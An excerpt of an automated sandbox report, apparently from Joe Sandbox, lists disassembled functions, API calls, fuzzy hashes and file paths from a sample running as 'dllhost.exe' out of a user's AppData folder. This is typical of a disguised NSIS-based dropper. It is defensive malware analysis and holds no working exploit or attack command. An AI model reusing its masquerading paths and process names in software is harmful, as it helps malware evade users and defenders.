                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                                • Part of subcall function 004052B0: lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                                                                • Part of subcall function 004052B0: SetWindowTextW.USER32(Completed,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233), ref: 0040531D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                                • Part of subcall function 00405831: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                                                                • Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867
                                                                              • CloseHandle.KERNEL32(?), ref: 00401F47
                                                                                • Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
                                                                                • Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32(?,?), ref: 0040670A
                                                                                • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                              • String ID:
                                                                              • API String ID: 2972824698-0
                                                                              • Opcode ID: 0740133e7f1fe2b7b0051514b90c0aefed60c2f2f9dde2b55e99776757eabb61
                                                                              • Instruction ID: bab1dc3541612b80991091494b36371daed99366b6aa6fafa292830653d85492
                                                                              • Opcode Fuzzy Hash: 0740133e7f1fe2b7b0051514b90c0aefed60c2f2f9dde2b55e99776757eabb61
                                                                              • Instruction Fuzzy Hash: 95F09032905121EBCB21FBA18D8899E72A49F01328B2505BBF501F21D1C77D0E518AAE

                                                                              Non-executed Functions

                                                                              Function 00404C2C Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404C44
                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404C4F
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                                                              • LoadBitmapW.USER32 ref: 00404CAC
                                                                              • SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                                                              • DeleteObject.GDI32(00000000), ref: 00404D22
                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
                                                                              • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                                                              • GlobalFree.KERNEL32(?), ref: 0040505C
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
                                                                              • ShowWindow.USER32(?,00000000), ref: 004051FB
                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405206
                                                                              • ShowWindow.USER32(00000000), ref: 0040520D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                              • String ID: $M$N
                                                                              • API String ID: 1638840714-813528018
                                                                              • Opcode ID: 53b2961380e6d72bc5a192face6fddd67d0e305c1ee816909df721ce3db20383
                                                                              • Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
                                                                              • Opcode Fuzzy Hash: 53b2961380e6d72bc5a192face6fddd67d0e305c1ee816909df721ce3db20383
                                                                              • Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58
                                                                              Function 0040483D Relevance: 3.1, APIs: 2, Instructions: 145COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?,?,000003FB), ref: 004048F8
                                                                              • MulDiv.KERNEL32 ref: 00404913
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: DiskFreeSpace
                                                                              • String ID:
                                                                              • API String ID: 1705453755-0
                                                                              • Opcode ID: 3490922e130cbcd6f215e765ee456f67188aa5af01173b4f76d041e006f901ee
                                                                              • Instruction ID: 9a9fd1e5b3774f6fe0778c5d2b37533d6795c7f16e5f693b0d4383bc8e2a2676
                                                                              • Opcode Fuzzy Hash: 3490922e130cbcd6f215e765ee456f67188aa5af01173b4f76d041e006f901ee
                                                                              • Instruction Fuzzy Hash: B251A2F1901209EBCB11EFB1D840AEFB7B9EF84314F24857BE601B61D1D7389A418B69
                                                                              Function 0040437E Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040441C
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404430
                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
                                                                              • GetSysColor.USER32(?), ref: 0040445E
                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                                                              • lstrlenW.KERNEL32(?), ref: 0040447F
                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004044FA
                                                                              • SendMessageW.USER32(00000000), ref: 00404501
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040452C
                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                                                              • LoadCursorW.USER32 ref: 0040457D
                                                                              • SetCursor.USER32(00000000), ref: 00404580
                                                                              • LoadCursorW.USER32 ref: 00404599
                                                                              • SetCursor.USER32(00000000), ref: 0040459C
                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                              • String ID: ,UZ$: Completed$N
                                                                              • API String ID: 3103080414-2381332617
                                                                              • Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                                              • Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
                                                                              • Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                                              • Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59
                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                              • FillRect.USER32 ref: 004010E4
                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                              • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                              • String ID: F
                                                                              • API String ID: 941294808-1304234792
                                                                              • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                              • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                              • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                              • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                              Function 00405E98 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405ED3
                                                                              • GetShortPathNameW.KERNEL32(?,00426D88,00000400,?,?,00406033,?,?), ref: 00405EDC
                                                                                • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                                                • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                                              • GetShortPathNameW.KERNEL32(?,00427588,00000400,?,00000000,?,?,00406033,?,?), ref: 00405EF9
                                                                              • wsprintfA.USER32 ref: 00405F17
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                                                              • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406000
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00406007
                                                                                • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                                • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D64
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                              • String ID: %ls=%ls$[Rename]
                                                                              • API String ID: 2171350718-461813615
                                                                              • Opcode ID: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                                                              • Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
                                                                              • Opcode Fuzzy Hash: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                                                              • Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
                                                                              Function 004047DE Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 183stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoTaskMemFree.OLE32 ref: 004047E5
                                                                                • Part of subcall function 00405B1D: lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                                                                • Part of subcall function 00405B1D: CharPrevW.USER32(?,00000000), ref: 00405B2D
                                                                                • Part of subcall function 00405B1D: lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B3F
                                                                              • lstrcmpiW.KERNEL32(: Completed,?,00000000,?), ref: 00404817
                                                                              • lstrcatW.KERNEL32(?,: Completed,?,00000000,?), ref: 00404823
                                                                              • SetDlgItemTextW.USER32(?,000003FB), ref: 00404835
                                                                              • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?,?,000003FB), ref: 004048F8
                                                                              • MulDiv.KERNEL32 ref: 00404913
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Freelstrcat$CharDiskItemPrevSpaceTaskTextlstrcmpilstrlen
                                                                              • String ID: : Completed$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea
                                                                              • API String ID: 611778071-2084225728
                                                                              • Opcode ID: 1fa5789cdcb1e2cd980dcc05ec4352f4ddb055ac1aa6b3b5aaf3b34fcfb88657
                                                                              • Instruction ID: 0d4a6a07d32540202bd103048eaebc2e62f3dbef9356839362eadbdc3d2543bd
                                                                              • Opcode Fuzzy Hash: 1fa5789cdcb1e2cd980dcc05ec4352f4ddb055ac1aa6b3b5aaf3b34fcfb88657
                                                                              • Instruction Fuzzy Hash: 6A5191F1A00209ABDB11AFA5CD45AAF76B8EF84315F10847BF601B62D1D73C9A418B6D
                                                                              Function 004064E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Char$Next$Prev
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 589700163-3050598723
                                                                              • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                              • Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
                                                                              • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                              • Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
                                                                              Function 00404248 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404265
                                                                              • GetSysColor.USER32(00000000,?), ref: 00404281
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040428D
                                                                              • SetBkMode.GDI32(?,?), ref: 00404299
                                                                              • GetSysColor.USER32(?), ref: 004042AC
                                                                              • SetBkColor.GDI32(?,?), ref: 004042BC
                                                                              • DeleteObject.GDI32(?), ref: 004042D6
                                                                              • CreateBrushIndirect.GDI32(?), ref: 004042E0
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
